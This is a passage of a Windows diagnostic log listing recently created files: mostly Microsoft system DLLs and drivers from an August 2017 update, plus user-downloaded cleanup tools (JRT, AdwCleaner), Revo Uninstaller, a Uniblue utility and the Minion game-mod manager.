2017-08-08 19:26 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll
2017-08-08 19:26 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll
2017-08-08 19:26 - 2017-07-31 17:15 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-08-08 19:26 - 2017-07-31 17:15 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-08-08 19:26 - 2017-07-28 07:30 - 001068720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-08-08 19:26 - 2017-07-28 07:25 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 002327456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-08 19:26 - 2017-07-28 07:24 - 000455584 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 000119904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-08-08 19:26 - 2017-07-28 07:24 - 000116280 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-08 19:26 - 2017-07-28 07:23 - 002969888 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-08 19:26 - 2017-07-28 07:23 - 000723360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-08 19:26 - 2017-07-28 07:22 - 000923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-08-08 19:26 - 2017-07-28 07:20 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-08 19:26 - 2017-07-28 07:17 - 000660680 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-08 19:26 - 2017-07-28 07:16 - 007326128 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-08 19:26 - 2017-07-28 07:16 - 000961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 005302968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 000872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-08-08 19:26 - 2017-07-28 07:15 - 000715168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-08-08 19:26 - 2017-07-28 07:15 - 000554400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-08 19:26 - 2017-07-28 07:14 - 000654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-08 19:26 - 2017-07-28 07:14 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-08 19:26 - 2017-07-28 07:13 - 007907344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 006557520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 002604248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 001054280 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 001033544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 000192264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2017-08-08 19:26 - 2017-07-28 07:13 - 000104432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 021353208 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 001337856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-08-08 19:26 - 2017-07-28 07:12 - 000323936 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll
2017-08-08 19:26 - 2017-07-28 07:10 - 002679200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-08 19:26 - 2017-07-28 07:10 - 001114528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-08-08 19:26 - 2017-07-28 07:09 - 000529992 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-08-08 19:26 - 2017-07-28 07:09 - 000527976 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-08-08 19:26 - 2017-07-28 07:09 - 000387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-08-08 19:26 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcd.dll
2017-08-08 19:26 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-08-08 19:26 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-08-08 19:26 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-08-08 19:26 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-08-08 19:26 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2017-08-08 19:26 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2017-08-08 19:26 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msacm32.dll
2017-08-08 19:26 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-08-08 19:26 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shlwapi.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-08-08 19:26 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2017-08-08 19:26 - 2017-07-28 06:31 - 003995136 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-08-08 19:26 - 2017-07-28 06:30 - 001722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\dui70.dll
2017-08-08 19:26 - 2017-07-28 06:29 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-08-08 19:26 - 2017-07-28 06:29 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-08-08 19:26 - 2017-07-28 06:27 - 000051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2017-08-08 19:26 - 2017-07-28 06:26 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe
2017-08-08 19:26 - 2017-07-28 06:26 - 000044032 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2017-08-08 19:26 - 2017-07-28 06:26 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbon.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-08-08 19:26 - 2017-07-28 06:25 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-08-08 19:26 - 2017-07-28 06:25 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000184832 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-08-08 19:26 - 2017-07-28 06:24 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-08-08 19:26 - 2017-07-28 06:23 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-08-08 19:26 - 2017-07-28 06:22 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000491520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-08-08 19:26 - 2017-07-28 06:22 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000209408 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-08-08 19:26 - 2017-07-28 06:22 - 000197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-08-08 19:26 - 2017-07-28 06:21 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll
2017-08-08 19:26 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 001015296 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-08-08 19:26 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IpNatHlpClient.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 001878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000942592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000687616 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-08-08 19:26 - 2017-07-28 06:19 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-08-08 19:26 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2017-08-08 19:26 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryUpgrade.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001298432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 001260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-08-08 19:26 - 2017-07-28 06:18 - 000925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000777216 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000536064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-08 19:26 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 002805248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-08 19:26 - 2017-07-28 06:17 - 000420864 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 001046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-08-08 19:26 - 2017-07-28 06:16 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-08-08 19:26 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qasf.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 003204608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000612864 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll
2017-08-08 19:26 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 001305088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-08-08 19:26 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-08-08 19:26 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 004535296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 001293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2017-08-08 19:26 - 2017-07-28 06:13 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2017-08-08 19:26 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 004707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 002939392 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 002444288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-08-08 19:26 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-08-08 19:26 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-08-08 19:26 - 2017-07-28 06:11 - 001357312 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-08-08 19:26 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 001706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-08-08 19:26 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shsvcs.dll
2017-08-08 19:26 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-08-08 19:26 - 2017-07-28 06:09 - 000971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-08-08 19:26 - 2017-07-28 06:09 - 000579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-08-08 19:26 - 2017-07-28 06:08 - 000097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2017-08-08 19:26 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2017-08-08 19:26 - 2017-07-28 06:07 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2017-08-08 19:26 - 2017-07-28 06:07 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 001833984 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-08-08 19:26 - 2017-07-28 06:06 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 001525760 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 001087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 000954368 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-08-08 19:26 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\untfs.dll
2017-08-08 19:26 - 2017-07-28 06:05 - 000078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
2017-08-08 19:26 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoconv.exe
2017-08-08 19:26 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autofmt.exe
2017-08-08 19:26 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spbcd.dll
2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ C:\Users\***\AppData\Local\resmon.resmoncfg
2017-08-07 23:58 - 2017-08-09 18:57 - 000000555 _____ C:\Users\***\Desktop\JRT.txt
2017-08-07 23:57 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Desktop\JRT.exe
2017-08-07 23:56 - 2017-08-07 23:56 - 001790024 _____ (Malwarebytes) C:\Users\***\Downloads\JRT.exe
2017-08-07 23:35 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Desktop\adwcleaner_7.0.1.0.exe
2017-08-07 23:34 - 2017-08-07 23:34 - 008185288 _____ (Malwarebytes) C:\Users\***\Downloads\adwcleaner_7.0.1.0.exe
2017-08-06 01:08 - 2017-08-06 01:08 - 001160480 _____ (Uniblue Systems Limited ) C:\Users\***\Downloads\pcmechanicpm.exe
2017-08-06 00:28 - 2017-08-06 00:28 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-08-05 22:57 - 2017-08-05 22:57 - 000000927 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-08-05 22:57 - 2017-08-05 22:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-08-04 22:53 - 2017-08-09 18:59 - 000000000 ____D C:\Users\***\.junique
2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\***\.minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\AppData\Roaming\gg.minion.Minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\***\.oracle_jre_usage
2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\***\Desktop\Minion3.0.5.exe
